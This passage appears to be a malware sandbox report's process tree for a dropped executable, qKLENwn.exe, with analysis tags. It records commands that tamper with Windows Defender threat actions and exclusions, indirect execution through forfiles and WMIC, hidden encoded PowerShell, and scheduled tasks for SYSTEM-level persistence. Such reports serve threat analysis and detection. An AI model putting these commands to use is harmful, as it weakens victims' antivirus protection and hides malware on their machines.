                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:3144
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                        3⤵
                                                          PID:964
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                          3⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:3428
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                          3⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:3244
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                          3⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:4200
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                          3⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:3480
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                          3⤵
                                                            PID:3972
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                            3⤵
                                                              PID:5032
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                              3⤵
                                                                PID:824
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                3⤵
                                                                  PID:2268
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AXIMGRmNcjuU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AXIMGRmNcjuU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UtWJzMtQRbBWenIIikR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UtWJzMtQRbBWenIIikR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bbiQWjFxyQUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bbiQWjFxyQUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oUbFZcjishNOC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oUbFZcjishNOC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oUieOXlOU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oUieOXlOU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CKabrDMveeUvWwVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CKabrDMveeUvWwVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\MSHPIPluhvwZZmvKH\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\MSHPIPluhvwZZmvKH\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\iFPNyOqWEPleGUTI\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\iFPNyOqWEPleGUTI\" /t REG_DWORD /d 0 /reg:64;"
                                                                2⤵
                                                                • Drops file in System32 directory
                                                                • Modifies data under HKEY_USERS
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:2436
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AXIMGRmNcjuU2" /t REG_DWORD /d 0 /reg:32
                                                                  3⤵
                                                                    PID:4844
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AXIMGRmNcjuU2" /t REG_DWORD /d 0 /reg:32
                                                                      4⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:3736
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AXIMGRmNcjuU2" /t REG_DWORD /d 0 /reg:64
                                                                    3⤵
                                                                      PID:2052
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UtWJzMtQRbBWenIIikR" /t REG_DWORD /d 0 /reg:32
                                                                      3⤵
                                                                        PID:4468
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UtWJzMtQRbBWenIIikR" /t REG_DWORD /d 0 /reg:64
                                                                        3⤵
                                                                          PID:3592
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bbiQWjFxyQUn" /t REG_DWORD /d 0 /reg:32
                                                                          3⤵
                                                                            PID:1080
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bbiQWjFxyQUn" /t REG_DWORD /d 0 /reg:64
                                                                            3⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:4160
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oUbFZcjishNOC" /t REG_DWORD /d 0 /reg:32
                                                                            3⤵
                                                                              PID:1556
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oUbFZcjishNOC" /t REG_DWORD /d 0 /reg:64
                                                                              3⤵
                                                                                PID:1176
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oUieOXlOU" /t REG_DWORD /d 0 /reg:32
                                                                                3⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:2500
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oUieOXlOU" /t REG_DWORD /d 0 /reg:64
                                                                                3⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:460
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CKabrDMveeUvWwVB /t REG_DWORD /d 0 /reg:32
                                                                                3⤵
                                                                                  PID:2140
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CKabrDMveeUvWwVB /t REG_DWORD /d 0 /reg:64
                                                                                  3⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:4896
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                  3⤵
                                                                                    PID:224
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                    3⤵
                                                                                      PID:4328
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                      3⤵
                                                                                        PID:4732
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                        3⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:4112
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\MSHPIPluhvwZZmvKH /t REG_DWORD /d 0 /reg:32
                                                                                        3⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:4576
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\MSHPIPluhvwZZmvKH /t REG_DWORD /d 0 /reg:64
                                                                                        3⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:2832
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\iFPNyOqWEPleGUTI /t REG_DWORD /d 0 /reg:32
                                                                                        3⤵
                                                                                          PID:3868
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\iFPNyOqWEPleGUTI /t REG_DWORD /d 0 /reg:64
                                                                                          3⤵
                                                                                            PID:1048
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          schtasks /CREATE /TN "gLAjqozjD" /SC once /ST 00:31:18 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                          2⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                          PID:3460
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          schtasks /run /I /tn "gLAjqozjD"
                                                                                          2⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:1952
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          schtasks /DELETE /F /TN "gLAjqozjD"
                                                                                          2⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:4844
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          schtasks /CREATE /TN "KqXMFdkUyVSRxNGim" /SC once /ST 00:52:23 /RU "SYSTEM" /TR "\"C:\Windows\Temp\iFPNyOqWEPleGUTI\opeKEVRCtakpfpS\qKLENwn.exe\" s5 /MbjCdidgH 385104 /S" /V1 /F
                                                                                          2⤵
                                                                                          • Drops file in Windows directory
                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                          PID:1080
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          schtasks /run /I /tn "KqXMFdkUyVSRxNGim"
                                                                                          2⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:4876
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4232 -s 1388
                                                                                          2⤵
                                                                                          • Program crash
                                                                                          PID:4328
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                        1⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:2400
                                                                                        • C:\Windows\system32\gpupdate.exe
                                                                                          "C:\Windows\system32\gpupdate.exe" /force
                                                                                          2⤵
                                                                                            PID:2336
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                          1⤵
                                                                                            PID:4616
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                            1⤵
                                                                                              PID:4200
                                                                                            • C:\Windows\system32\gpscript.exe
                                                                                              gpscript.exe /RefreshSystemParam
                                                                                              1⤵
                                                                                                PID:1968
                                                                                              • C:\Windows\Temp\iFPNyOqWEPleGUTI\opeKEVRCtakpfpS\qKLENwn.exe
                                                                                                C:\Windows\Temp\iFPNyOqWEPleGUTI\opeKEVRCtakpfpS\qKLENwn.exe s5 /MbjCdidgH 385104 /S
                                                                                                1⤵
                                                                                                • Checks computer location settings
                                                                                                • Executes dropped EXE
                                                                                                • Drops Chrome extension
                                                                                                • Drops file in System32 directory
                                                                                                • Drops file in Program Files directory
                                                                                                • Modifies data under HKEY_USERS
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                PID:3080
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                  2⤵
                                                                                                    PID:4432
                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                      3⤵
                                                                                                      • Indirect Command Execution
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:864
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                        4⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:2508
                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                          5⤵
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:4808
                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                      3⤵
                                                                                                      • Indirect Command Execution
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:1148
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                        4⤵
                                                                                                          PID:876
                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                            5⤵
                                                                                                              PID:3704
                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                          3⤵
                                                                                                          • Indirect Command Execution
                                                                                                          PID:1048
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                            4⤵
                                                                                                              PID:5040
                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                5⤵
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:432
                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                            forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                            3⤵
                                                                                                            • Indirect Command Execution
                                                                                                            PID:3872
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                              4⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:3984
                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                5⤵
                                                                                                                  PID:1508
                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                              forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                              3⤵
                                                                                                              • Indirect Command Execution
                                                                                                              PID:1952
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                4⤵
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:2480
                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                  5⤵
                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                  • Drops file in System32 directory
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:3548
                                                                                                                  • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                    6⤵
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:2788
                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                            schtasks /DELETE /F /TN "bFanEennwxaepJkUms"
                                                                                                            2⤵
                                                                                                              PID:3232
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
                                                                                                              2⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:872
                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                3⤵
                                                                                                                • Indirect Command Execution
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:5100
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                  4⤵
                                                                                                                    PID:3204
                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                      5⤵
                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                      • Drops file in System32 directory
                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:2160
                                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                        6⤵
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:4160
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\oUieOXlOU\txPmgO.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "cmIxulIliRylHGj" /V1 /F
                                                                                                                2⤵
                                                                                                                • Drops file in Windows directory
                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                PID:996
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /CREATE /TN "cmIxulIliRylHGj2" /F /xml "C:\Program Files (x86)\oUieOXlOU\lzlWqTJ.xml" /RU "SYSTEM"
                                                                                                                2⤵
                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                PID:3144
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /END /TN "cmIxulIliRylHGj"
                                                                                                                2⤵
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:1348
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /DELETE /F /TN "cmIxulIliRylHGj"
                                                                                                                2⤵
                                                                                                                  PID:4828
                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  schtasks /CREATE /TN "gQgbjzCQHprWvl" /F /xml "C:\Program Files (x86)\AXIMGRmNcjuU2\KqxPXaN.xml" /RU "SYSTEM"
                                                                                                                  2⤵
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                  PID:4432
                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  schtasks /CREATE /TN "BbLLyLTQHQung2" /F /xml "C:\ProgramData\CKabrDMveeUvWwVB\TVshSEs.xml" /RU "SYSTEM"
                                                                                                                  2⤵
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                  PID:3692
                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  schtasks /CREATE /TN "IAysflnNVsUMMqjZF2" /F /xml "C:\Program Files (x86)\UtWJzMtQRbBWenIIikR\xdYhBEQ.xml" /RU "SYSTEM"
                                                                                                                  2⤵
                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                  PID:4864
                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
